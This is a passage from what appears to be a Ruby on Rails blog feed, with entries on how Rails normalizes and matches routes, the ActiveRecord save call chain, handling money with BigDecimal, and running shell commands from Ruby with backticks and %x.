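      elsif text = ss.scan(/:[a-zA-Z]+/)
        tokens << [:SYMBOL, text]
      elsif text = ss.scan(/[a-zA-Z]+/)
        tokens << [:LITERAL, text]
      else
        ss.getch # skip anything we do not recognize
      end
    end
    tokens
  end
end

p HandRolledScanner.new.tokenize("/:page")
# => [[:SLASH, "/"], [:SYMBOL, ":page"]]
```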
He hand rolled the <a href="https://github.com/rails/journey/blob/master/lib/journey/scanner.rb">scanner</a>.</p><h2>Conclusion</h2><p>In this blog we saw how to use <code>rex</code> to build a scanner that reads our routing statements. In the next blog we'll see how to parse a routing statement and how to find the matching routing statement for a given URL.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails Routing -- a comprehensive look at routing]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/journey-into-rails-routing"/>
      <updated>2013-01-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/journey-into-rails-routing</id>
<content type="html"><![CDATA[<p><em>The following code was tested with edge Rails (Rails 4).</em></p><p>When a Rails application boots, it reads the <code>config/routes.rb</code> file. In your routes you might have code like this.</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do
  root 'users#index'
  resources :users
  get 'photos/:id' =&gt; 'photos#show', :defaults =&gt; { :format =&gt; 'jpg' }
  get '/logout' =&gt; 'sessions#destroy', :as =&gt; :logout
  get &quot;/stories&quot; =&gt; redirect(&quot;/photos&quot;)
end</code></pre><p>In the above case there are five different routing statements. Rails needs to store all those routes in a manner such that later, when the url is '/photos/5', it can find the right route statement to handle the request.</p><p>In this article we are going to take a peek at how Rails handles the whole routing business.</p><h2>Normalization in action</h2><p>In order to compare various routing statements, all the routing statements first need to be normalized to a standard format so that one route statement can easily be compared with another.</p><p>Before we take a deep dive into how the normalization works, let's first see some normalizations in action.</p><h2>get call with defaults</h2><p>Here we have the following route.</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do
  get 'photos/:id' =&gt; 'photos#show', :defaults =&gt; { :format =&gt; 'jpg' }
end</code></pre><p>After the normalization process the above routing statement is transformed into five different variables. 
The values for all those five variables is shownbelow.</p><pre><code class="language-plaintext">app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007fd05e0cf7e8           @defaults={:format=&gt;&quot;jpg&quot;, :controller=&gt;&quot;photos&quot;, :action=&gt;&quot;show&quot;},           @glob_param=nil,           @controller_class_names=#&lt;ThreadSafe::Cache:0x007fd05e0cf7c0           @backend={},           @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/photos/:id(.:format)&quot;, :required_defaults=&gt;[:controller, :action], :request_method=&gt;[&quot;GET&quot;]}requirements: {}defaults: {:format=&gt;&quot;jpg&quot;, :controller=&gt;&quot;photos&quot;, :action=&gt;&quot;show&quot;}as: nilanchor: true</code></pre><p><code>app</code> is the application that will be executed if conditions are met.<code>conditions</code> are the conditions. Pay attention to <code>:path_info</code> in conditions.This is used by Rails to determine the right route statement. <code>defaults</code> aredefaults and <code>requirements</code> are the constraints.</p><h2>GET call with as</h2><p>Here we have following route</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do  get '/logout' =&gt; 'sessions#destroy', :as =&gt; :logoutend</code></pre><p>After normalization above code gets following values</p><pre><code class="language-plaintext">app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f8ded87e740           @defaults={:controller=&gt;&quot;sessions&quot;, :action=&gt;&quot;destroy&quot;},           @glob_param=nil,           @controller_class_names=#&lt;ThreadSafe::Cache:0x007f8ded87e718 @backend={},           @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/logout(.:format)&quot;, :required_defaults=&gt;[:controller, :action], :request_method=&gt;[&quot;GET&quot;]}requirements: {}defaults: {:controller=&gt;&quot;sessions&quot;, :action=&gt;&quot;destroy&quot;}as: &quot;logout&quot;anchor: true</code></pre><p>Notice that 
in the above case <code>as</code> is populate with <code>logout</code> .</p><h2>root call</h2><p>Here we have following route</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do  root 'users#index'end</code></pre><p>After normalization above code gets following values</p><pre><code class="language-plaintext">app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007fe91507f278           @defaults={:controller=&gt;&quot;users&quot;, :action=&gt;&quot;index&quot;},           @glob_param=nil,           @controller_class_names=#&lt;ThreadSafe::Cache:0x007fe91507f250 @backend={},           @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/&quot;, :required_defaults=&gt;[:controller, :action], :request_method=&gt;[&quot;GET&quot;]}requirements: {}defaults: {:controller=&gt;&quot;users&quot;, :action=&gt;&quot;index&quot;}as: &quot;root&quot;anchor: true</code></pre><p>Notice that in the above case <code>as</code> is populated. And the <code>path_info</code> is <code>/</code>since this is the root url .</p><h2>GET call with constraints</h2><p>Here we have following route</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do  #get 'pictures/:id' =&gt; 'pictures#show', :constraints =&gt; { :id =&gt; /[A-Z]\d{5}/ }end</code></pre><p>After normalization above code gets following values</p><pre><code class="language-plaintext">app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f8158e052c8           @defaults={:controller=&gt;&quot;pictures&quot;, :action=&gt;&quot;show&quot;},           @glob_param=nil,           @controller_class_names=#&lt;ThreadSafe::Cache:0x007f8158e05278 @backend={},           @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/pictures/:id(.:format)&quot;, :required_defaults=&gt;[:controller, :action], :request_method=&gt;[&quot;GET&quot;]}requirements: {:id=&gt;/[A-Z]\d{5}/}defaults: {:controller=&gt;&quot;pictures&quot;, :action=&gt;&quot;show&quot;}as: nilanchor: 
true</code></pre><p>Notice that in the above case <code>requirements</code> is populated with constraintsmentioned in the route definition .</p><h2>get with a redirect</h2><p>Here we have following route</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do  get &quot;/stories&quot; =&gt; redirect(&quot;/posts&quot;)end</code></pre><p>After normalization above code gets following values</p><pre><code class="language-plaintext">app: redirect(301, /posts)conditions: {:path_info=&gt;&quot;/stories(.:format)&quot;, :required_defaults=&gt;[], :request_method=&gt;[&quot;GET&quot;]}requirements: {}defaults: {}as: &quot;stories&quot;anchor: true</code></pre><p>Notice that in the above case <code>app</code> is a simple redirect .</p><h2>Resources</h2><p>Here we have following route</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do  resources :usersend</code></pre><p>After normalization above code gets following values</p><pre><code class="language-plaintext">app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41a315c0           @defaults={:action=&gt;&quot;index&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d41a31598 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;GET&quot;]}defaults: {:action=&gt;&quot;index&quot;, :controller=&gt;&quot;users&quot;}as: &quot;users&quot;app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41a4ef80           @defaults={:action=&gt;&quot;create&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d41a4ef58 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;POST&quot;]}defaults: {:action=&gt;&quot;create&quot;, 
:controller=&gt;&quot;users&quot;}as: nilapp: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41b63790           @defaults={:action=&gt;&quot;new&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d41b63768 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users/new(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;GET&quot;]}defaults: {:action=&gt;&quot;new&quot;, :controller=&gt;&quot;users&quot;}as: &quot;new_user&quot;app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41a10550           @defaults={:action=&gt;&quot;edit&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d41a10528 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users/:id/edit(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;GET&quot;]}defaults: {:action=&gt;&quot;edit&quot;, :controller=&gt;&quot;users&quot;}as: &quot;edit_user&quot;app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41f31818           @defaults={:action=&gt;&quot;show&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d41f317f0 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users/:id(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;GET&quot;]}defaults: {:action=&gt;&quot;show&quot;, :controller=&gt;&quot;users&quot;}as: &quot;user&quot;app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d44a9bb70           @defaults={:action=&gt;&quot;update&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d44a9bb48 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users/:id(.:format)&quot;, :required_defaults=&gt;[:action, 
:controller], :request_method=&gt;[&quot;PATCH&quot;]}defaults: {:action=&gt;&quot;update&quot;, :controller=&gt;&quot;users&quot;}as: nilapp: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41b17480           @defaults={:action=&gt;&quot;update&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d41b17458 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users/:id(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;PUT&quot;]}defaults: {:action=&gt;&quot;update&quot;, :controller=&gt;&quot;users&quot;}as: nilapp: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d439ddf68           @defaults={:action=&gt;&quot;destroy&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007f9d439ddf40 @backend={}, @default_proc=nil&gt;&gt;conditions: {:path_info=&gt;&quot;/users/:id(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;DELETE&quot;]}defaults: {:action=&gt;&quot;destroy&quot;, :controller=&gt;&quot;users&quot;}as: nil</code></pre><p>In this case I omitted <code>requirements</code> and <code>anchor</code> for brevity .</p><p>Notice that a single routing statement <code>resources :users</code> created eightnormalized routing statements. 
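To make the expansion easier to scan, here are those eight routes written out as plain data, pulled from the dump above. This table is for illustration only; it is not how Rails stores routes internally.

```ruby
# The eight normalized routes behind `resources :users`, as plain data:
# [HTTP verb, path_info, controller#action, route name (as)].
USERS_ROUTES = [
  ["GET",    "/users(.:format)",          "users#index",   "users"],
  ["POST",   "/users(.:format)",          "users#create",  nil],
  ["GET",    "/users/new(.:format)",      "users#new",     "new_user"],
  ["GET",    "/users/:id/edit(.:format)", "users#edit",    "edit_user"],
  ["GET",    "/users/:id(.:format)",      "users#show",    "user"],
  ["PATCH",  "/users/:id(.:format)",      "users#update",  nil],
  ["PUT",    "/users/:id(.:format)",      "users#update",  nil],
  ["DELETE", "/users/:id(.:format)",      "users#destroy", nil],
]

puts USERS_ROUTES.size # => 8
```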
It means that the <code>resources</code> statement is basically a shortcut for defining all those eight routing statements.</p><h2>Resources with only</h2><p>Here we have the following route.</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do
  resources :users, only: :new
end</code></pre><p>After normalization the above code gets the following values.</p><pre><code class="language-plaintext">app: #&lt;ActionDispatch::Routing::RouteSet::Dispatcher:0x007fdf55043e40
          @defaults={:action=&gt;&quot;new&quot;, :controller=&gt;&quot;users&quot;}, @glob_param=nil, @controller_class_names=#&lt;ThreadSafe::Cache:0x007fdf55043e18 @backend={}, @default_proc=nil&gt;&gt;
conditions: {:path_info=&gt;&quot;/users/new(.:format)&quot;, :required_defaults=&gt;[:action, :controller], :request_method=&gt;[&quot;GET&quot;]}
defaults: {:action=&gt;&quot;new&quot;, :controller=&gt;&quot;users&quot;}
as: &quot;new_user&quot;</code></pre><p>Because of the <code>only</code> keyword, only one routing statement was produced in this case.</p><h2>Mapper</h2><p>In Rails the <code>ActionDispatch::Routing::Mapper</code> class is responsible for normalizing all routing statements.</p><pre><code class="language-ruby">module ActionDispatch
  module Routing
    class Mapper
      include Base
      include HttpHelpers
      include Redirection
      include Scoping
      include Concerns
      include Resources
    end
  end
end</code></pre><p>Now let's look at what these included modules do.</p><h2>Base</h2><pre><code class="language-ruby">module Base
  def root(options = {})
  end

  def match
  end

  def mount(app, options = {})
  end
end</code></pre><p>As you can see, <code>Base</code> handles the <code>root</code>, <code>match</code> and <code>mount</code> calls.</p><h2>HttpHelpers</h2><pre><code class="language-ruby">module HttpHelpers
  def get(*args, &amp;block)
  end

  def post(*args, &amp;block)
  end

  def patch(*args, &amp;block)
  end

  def put(*args, &amp;block)
  end

  def delete(*args, &amp;block)
  end
end</code></pre><p><code>HttpHelpers</code> handles <code>get</code>, <code>post</code>, <code>patch</code>, <code>put</code> and <code>delete</code>.</p><h2>Scoping</h2><pre><code class="language-ruby">module Scoping
  def scope(*args)
  end

  def namespace(path, options = {})
  end

  def constraints(constraints = {})
  end
end</code></pre><h2>Resources</h2><pre><code class="language-ruby">module Resources
  def resource(*resources, &amp;block)
  end

  def resources(*resources, &amp;block)
  end

  def collection
  end

  def member
  end

  def shallow
  end
end</code></pre><h2>Let's put all the routes together</h2><p>So now let's look at all the route definitions together.</p><pre><code class="language-ruby">Rails4demo::Application.routes.draw do
  root 'users#index'
  get 'photos/:id' =&gt; 'photos#show', :defaults =&gt; { :format =&gt; 'jpg' }
  get '/logout' =&gt; 'sessions#destroy', :as =&gt; :logout
  get 'pictures/:id' =&gt; 'pictures#show', :constraints =&gt; { :id =&gt; /[A-Z]\d{5}/ }
  get &quot;/stories&quot; =&gt; redirect(&quot;/posts&quot;)
  resources :users
end</code></pre><p>The above routes definition produces the following information. 
I am going to show only the path info.</p><pre><code class="language-plaintext">{:path_info=&gt;&quot;/&quot;}
{:path_info=&gt;&quot;/photos/:id(.:format)&quot;}
{:path_info=&gt;&quot;/logout(.:format)&quot;}
{:path_info=&gt;&quot;/pictures/:id(.:format)&quot;}
{:path_info=&gt;&quot;/stories(.:format)&quot;}
{:path_info=&gt;&quot;/users(.:format)&quot;, :request_method=&gt;[&quot;GET&quot;]}
{:path_info=&gt;&quot;/users(.:format)&quot;, :request_method=&gt;[&quot;POST&quot;]}
{:path_info=&gt;&quot;/users/new(.:format)&quot;, :request_method=&gt;[&quot;GET&quot;]}
{:path_info=&gt;&quot;/users/:id/edit(.:format)&quot;, :request_method=&gt;[&quot;GET&quot;]}
{:path_info=&gt;&quot;/users/:id(.:format)&quot;, :request_method=&gt;[&quot;GET&quot;]}
{:path_info=&gt;&quot;/users/:id(.:format)&quot;, :request_method=&gt;[&quot;PATCH&quot;]}
{:path_info=&gt;&quot;/users/:id(.:format)&quot;, :request_method=&gt;[&quot;PUT&quot;]}
{:path_info=&gt;&quot;/users/:id(.:format)&quot;, :request_method=&gt;[&quot;DELETE&quot;]}</code></pre><h2>How to find the matching route definition</h2><p>Now that we have normalized the routing definitions, the task at hand is to find the right route definition for a given url along with the request_method.</p><p>For example, if the requested page is <code>/pictures/A12345</code> then the matching routing definition should be <code>get 'pictures/:id' =&gt; 'pictures#show', :constraints =&gt; { :id =&gt; /[A-Z]\d{5}/ }</code>.</p><p>In order to accomplish that, I would do something like this.</p><p>I would convert each path info into a regular expression and push that regular expression into an array. 
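That linear-matching idea can be sketched as follows. This is an illustration of the strategy, not Rails' actual code, and it ignores constraints and request methods; the regexps are hand-written approximations of a few of the normalized paths.

```ruby
# Each normalized path_info becomes a regexp; match them one by one.
# A sketch of the linear-scan strategy; not Rails' actual implementation.
ROUTE_PATTERNS = {
  "/logout(.:format)"       => %r{\A/logout(?:\.[^/]+)?\z},
  "/pictures/:id(.:format)" => %r{\A/pictures/[^/]+(?:\.[^/]+)?\z},
  "/users/:id(.:format)"    => %r{\A/users/[^/]+(?:\.[^/]+)?\z},
}

# Returns the path_info of the first pattern that matches, or nil.
def find_route(url)
  ROUTE_PATTERNS.find { |_path, re| re =~ url }&.first
end

puts find_route("/pictures/A12345") # => /pictures/:id(.:format)
```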
So in this case I would have 13 regular expressions in the array, and for a given url I would try to match them one by one.</p><p>This strategy works, and this is how Rails worked all the way up to Rails 3.1.</p><h2>Aaron Patterson loves computer science</h2><p><a href="http://twitter.com/tenderlove">Aaron Patterson</a> noticed that finding the best matching route definition for a given url is nothing but a pattern matching task. Computer science has solved this problem much more elegantly, and the elegant solution also happens to run faster: build an AST and walk over it.</p><p>So he decided to make a mini language out of the route definitions. After all, the route definitions we write follow certain rules.</p><p>And thus <a href="http://github.com/rails/journey">Journey</a> was born.</p><p>In the next blog we will see how to write grammar rules for routing definitions, how to parse them, and then how to walk the AST to find the best match.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Life of save in ActiveRecord]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/live-of-save-in-activerecord"/>
      <updated>2013-01-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/live-of-save-in-activerecord</id>
      <content type="html"><![CDATA[<p><em>Following code was tested with edge rails (rails4) .</em></p><p>In a RubyonRails application we save records often. It is one of the most usedmethods in ActiveRecord. In the blog we are going to take a look at the lifecycle of save operation.</p><h2>ActiveRecord::Base</h2><p>A typical model looks like this.</p><pre><code class="language-ruby">class Article &lt; ActiveRecord::Baseend</code></pre><p>Now lets look at ActiveRecord::Base class in its entirety.</p><pre><code class="language-ruby">module ActiveRecord  class Base    extend ActiveModel::Naming    extend ActiveSupport::Benchmarkable    extend ActiveSupport::DescendantsTracker    extend ConnectionHandling    extend QueryCache::ClassMethods    extend Querying    extend Translation    extend DynamicMatchers    extend Explain    include Persistence    include ReadonlyAttributes    include ModelSchema    include Inheritance    include Scoping    include Sanitization    include AttributeAssignment    include ActiveModel::Conversion    include Integration    include Validations    include CounterCache    include Locking::Optimistic    include Locking::Pessimistic    include AttributeMethods    include Callbacks    include Timestamp    include Associations    include ActiveModel::SecurePassword    include AutosaveAssociation    include NestedAttributes    include Aggregations    include Transactions    include Reflection    include Serialization    include Store    include Core  end  ActiveSupport.run_load_hooks(:active_record, Base)end</code></pre><p><code>Base</code> class extends and includes a lot of modules. Here we are going to look atthe four modules that have method <code>def save</code> .</p><pre><code class="language-ruby">module ActiveRecord  class Base    ......................    include Persistence    .......................    include Validations    ........................    include AttributeMethods    ........................    
include Transactions
    ........................
  end
end</code></pre><h2>include Persistence</h2><p>The <code>Persistence</code> module defines the <code>save</code> method like this.</p><pre><code class="language-ruby">def save(*)
  create_or_update
rescue ActiveRecord::RecordInvalid
  false
end</code></pre><p>Now let's look at the method <code>create_or_update</code>.</p><pre><code class="language-ruby">def create_or_update
  raise ReadOnlyRecord if readonly?
  result = new_record? ? create_record : update_record
  result != false
end</code></pre><p>So the <code>save</code> method invokes <code>create_or_update</code>, and <code>create_or_update</code> either creates a record or updates a record. Dead simple.</p><h2>include Validations</h2><p>In the <code>Validations</code> module the <code>save</code> method is defined as</p><pre><code class="language-ruby">def save(options={})
  perform_validations(options) ? super : false
end</code></pre><p>In this case the <code>save</code> method simply invokes <code>perform_validations</code>.</p><h2>include AttributeMethods</h2><p>The <code>AttributeMethods</code> module includes a bunch of modules like this.</p><pre><code class="language-ruby">module ActiveRecord
  module AttributeMethods
    extend ActiveSupport::Concern
    include ActiveModel::AttributeMethods

    included do
      include Read
      include Write
      include BeforeTypeCast
      include Query
      include PrimaryKey
      include TimeZoneConversion
      include Dirty
      include Serialization
    end</code></pre><p>Here we want to look at the <code>Dirty</code> module, which has the <code>save</code> method defined as follows.</p><pre><code class="language-ruby">def save(*)
  if status = super
    @previously_changed = changes
    @changed_attributes.clear
  end
  status
end</code></pre><p>Since this module is all about tracking whether a record is dirty or not, the <code>save</code> method tracks the changed values.</p><h2>include Transactions</h2><p>In the <code>Transactions</code> module the 
<code>save</code> method is defined as</p><pre><code class="language-ruby">def save(*) #:nodoc:
  rollback_active_record_state! do
    with_transaction_returning_status { super }
  end
end</code></pre><p>The method <code>rollback_active_record_state!</code> is defined as</p><pre><code class="language-ruby">def rollback_active_record_state!
  remember_transaction_record_state
  yield
rescue Exception
  restore_transaction_record_state
  raise
ensure
  clear_transaction_record_state
end</code></pre><p>And the method <code>with_transaction_returning_status</code> is defined as</p><pre><code class="language-ruby">def with_transaction_returning_status
  status = nil
  self.class.transaction do
    add_to_transaction
    begin
      status = yield
    rescue ActiveRecord::Rollback
      @_start_transaction_state[:level] = (@_start_transaction_state[:level] || 0) - 1
      status = nil
    end
    raise ActiveRecord::Rollback unless status
  end
  status
end</code></pre><p>Together, <code>rollback_active_record_state!</code> and <code>with_transaction_returning_status</code> ensure that all the operations happening inside <code>save</code> happen in a single transaction.</p><h2>Why the save method needs to be in a transaction</h2><p>A model can define a number of callbacks, including <code>after_save</code> and <code>before_save</code>. All those callbacks are run within a transaction. It means that if an <code>after_save</code> callback raises an exception then the <code>save</code> operation is rolled back.</p><p>Not only that, a number of associations like <code>has_many</code> and <code>belongs_to</code> use callbacks to handle association manipulation. In order to ensure the integrity of the operation, the save operation is wrapped in a transaction.</p><h2>Reverse order of operation</h2><p>In the <code>Base</code> class the modules are included in the following order.</p><pre><code class="language-ruby">module ActiveRecord
  class Base
    ......................
    
include Persistence
    .......................
    include Validations
    ........................
    include AttributeMethods
    ........................
    include Transactions
    ........................
  end
end</code></pre><p>All four modules have a <code>save</code> method. The way Ruby works, the last module to be included gets to act on the method first. So the order in which the <code>save</code> method gets executed is <code>Transactions</code>, <code>AttributeMethods</code>, <code>Validations</code> and <code>Persistence</code>.</p><p>To get a visual feel, I added a <code>puts</code> inside each of the save methods. Here is the result.</p><pre><code class="language-plaintext">1.9.1 :001 &gt; User.new.save
entering save in transactions
   (0.1ms)  begin transaction
entering save in attribute_methods
entering save in validations
entering save in persistence
  SQL (47.3ms)  INSERT INTO &quot;users&quot; (&quot;created_at&quot;, &quot;updated_at&quot;) VALUES (?, ?)  [[&quot;created_at&quot;, Mon, 21 Jan 2013 14:56:52 UTC +00:00], [&quot;updated_at&quot;, Mon, 21 Jan 2013 14:56:52 UTC +00:00]]
leaving save in persistence
leaving save in validations
leaving save in attribute_methods
   (17.6ms)  rollback transaction
leaving save in transactions
 =&gt; nil</code></pre><p>As you can see, the order of operations is</p><pre><code class="language-plaintext">entering save in transactions
entering save in attribute_methods
entering save in validations
entering save in persistence
leaving save in persistence
leaving save in validations
leaving save in attribute_methods
leaving save in transactions</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Handling money in ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/handling-money-in-ruby"/>
      <updated>2013-01-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/handling-money-in-ruby</id>
<content type="html"><![CDATA[<p>In Ruby, do not use float for money calculations, since float is not good for precise calculation.</p><pre><code class="language-ruby">irb(main):001:0&gt; 200 * (7.0/100)
=&gt; 14.000000000000002</code></pre><p>7% of 200 should be 14. But float is returning <code>14.000000000000002</code>.</p><p>In order to ensure that the calculation is right, make sure that all the actors participating in the calculation are of class <a href="http://www.ruby-doc.org/stdlib-1.9.3/libdoc/bigdecimal/rdoc/BigDecimal.html">BigDecimal</a>. Here is how the same operation can be performed using BigDecimal.</p><pre><code class="language-ruby">irb(main):003:0&gt; result = BigDecimal.new(200) * ( BigDecimal.new(7)/BigDecimal.new(100))
=&gt; #&lt;BigDecimal:7fa5eefa1720,'0.14E2',9(36)&gt;
irb(main):004:0&gt; result.to_s
=&gt; &quot;14.0&quot;</code></pre><p>As we can see, BigDecimal gives a much more accurate result.</p><h2>Converting money to cents</h2><p>In order to charge the credit card using <a href="https://stripe.com/">Stripe</a> we needed the amount to be charged in cents. One way to convert the value to cents would be</p><pre><code class="language-ruby">amount  = BigDecimal.new(200) * ( BigDecimal.new(7)/BigDecimal.new(100))
puts (amount * 100).to_i #=&gt; 1400</code></pre><p>The above method works, but I like to delegate the job of making money out of a BigDecimal value to a gem like <a href="https://rubygems.org/gems/money">money</a>. In this project we are using <a href="https://rubygems.org/gems/activemerchant">activemerchant</a>, which depends on the money gem. So we get the money gem for free. 
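As an aside, the same cents conversion works on modern Rubies without any gems. Note that <code>BigDecimal.new</code> has since been removed from newer Ruby versions in favor of the <code>BigDecimal()</code> conversion method, which this sketch uses.

```ruby
require 'bigdecimal'

# Same 7%-of-200 calculation, converted to integer cents.
# Note: newer Rubies use BigDecimal(...) instead of BigDecimal.new(...).
amount = BigDecimal(200) * (BigDecimal(7) / BigDecimal(100))
cents  = (amount * 100).to_i
puts cents # => 1400
```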
You might have to add the money gem to the Gemfile if you want to use the following technique.</p><p>The money gem lets you get a Money instance out of a BigDecimal.</p><pre><code class="language-ruby">amount = BigDecimal.new(200) * ( BigDecimal.new(7)/BigDecimal.new(100))
amount_in_money = amount.to_money
puts amount_in_money.cents #=&gt; 1400</code></pre><h2>Stay in BigDecimal or money mode for calculation</h2><p>If you are doing any sort of calculation then all participating elements must be either BigDecimal or Money instances. It is best if all the elements are of the same type.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Executing shell commands in ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/backtick-system-exec-in-ruby"/>
      <updated>2012-10-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/backtick-system-exec-in-ruby</id>
      <content type="html"><![CDATA[<p>Ruby allows many different ways to execute a command or a sub-process. In this article we are going to see some of them.</p><h2>backtick</h2><h4>1. Returns standard output</h4><p><a href="http://ruby-doc.org/core-1.9.3/Kernel.html#method-i-60">backtick</a> returns the standard output (<code>stdout</code>) of the operation.</p><pre><code class="language-ruby">output = `pwd`
puts &quot;output is #{output}&quot;</code></pre><pre><code class="language-ruby">$ ruby main.rb
output is /Users/neerajsingh/code/misc</code></pre><p>backtick does not capture <code>STDERR</code>. If you want to learn about <code>STDERR</code> then check out this <a href="https://www.howtogeek.com/435903/what-are-stdin-stdout-and-stderr-on-linux/">excellent article</a>.</p><p>You can redirect <code>STDERR</code> to <code>STDOUT</code> if you want to capture <code>STDERR</code> using backtick.</p><pre><code class="language-ruby">output = `grep hosts /private/etc/* 2&gt;&amp;1`</code></pre><h4>2. Exception is passed on to the main program</h4><p>The backtick operation forks the master process and the operation is executed in a new process. If there is an exception in the sub-process then that exception is given to the main process, and the main process might terminate if the exception is not handled.</p><p>In the following case I am executing <code>xxxxxxx</code>, which is not a valid executable name.</p><pre><code class="language-ruby">output = `xxxxxxx`
puts &quot;output is #{output}&quot;</code></pre><p>The result of the above code is given below. Notice that <code>puts</code> was never executed because the backtick operation raised an exception.</p><pre><code class="language-ruby">$ ruby main.rb
main.rb:1:in ``': No such file or directory - xxxxxxx (Errno::ENOENT)
from main.rb:1:in `&lt;main&gt;'</code></pre><h4>3. Blocking operation</h4><p>Backtick is a blocking operation. The main application waits until the backtick operation completes.</p><h4>4. 
Checking the status of the operation</h4><p>To check the status of the backtick operation you can execute <code>$?.success?</code></p><pre><code class="language-ruby">output = `ls`
puts &quot;output is #{output}&quot;
puts $?.success?</code></pre><p>Notice that the last line of the result contains <code>true</code> because the backtick operation was a success.</p><pre><code class="language-ruby">$ ruby main.rb
output is lab.rb
main.rb
true</code></pre><h4>5. String interpolation is allowed within the ticks</h4><pre><code class="language-ruby">cmd = 'ls'
`#{cmd}`</code></pre><h4>6. Different delimiters and string interpolation</h4><p><code>%x</code> does the same thing as backtick. It allows you to have a different delimiter.</p><pre><code class="language-ruby">output = %x[ ls ]
output = %x{ ls }</code></pre><p>backtick runs the command in a subshell. So features like string interpolation and shell wild cards can be used. Here is an example.</p><pre><code class="language-ruby">$ irb
&gt; dir = '/etc'
&gt; %x&lt;ls -al #{dir}&gt;
=&gt; &quot;lrwxr-xr-x@ 1 root  wheel  11 Jan  5 21:10 /etc -&gt; private/etc&quot;</code></pre><p>If you are building a script which you mean to run on your laptop and not on a server, then most likely you want the script to abort if there is an exception. For such cases <code>backtick</code> is the best choice.</p><p>For example, let's say that I want to write a script to make my repo up-to-date automatically. The command would be something like this.</p><pre><code>cd directory_name &amp;&amp; git checkout main &amp;&amp; git pull origin main</code></pre><p>If there is any error while executing this command then you want to have full access to the exception so that you can debug. 
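</p><p>For instance, a backtick call to a program that does not exist raises <code>Errno::ENOENT</code>, which a script can either let crash the run or rescue explicitly. A minimal sketch (the command name is deliberately bogus):</p>

```ruby
# Backtick raises Errno::ENOENT when the executable cannot be found,
# so a script fails loudly instead of continuing with empty output.
begin
  `surely_no_such_command_here`
rescue Errno::ENOENT => e
  warn "command not found: #{e.message}"
end
```

<p>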
In such cases the best way to execute this command is as shown below.</p><pre><code>cmd = &quot;cd #{directory_name} &amp;&amp; git checkout main &amp;&amp; git pull origin main&quot;
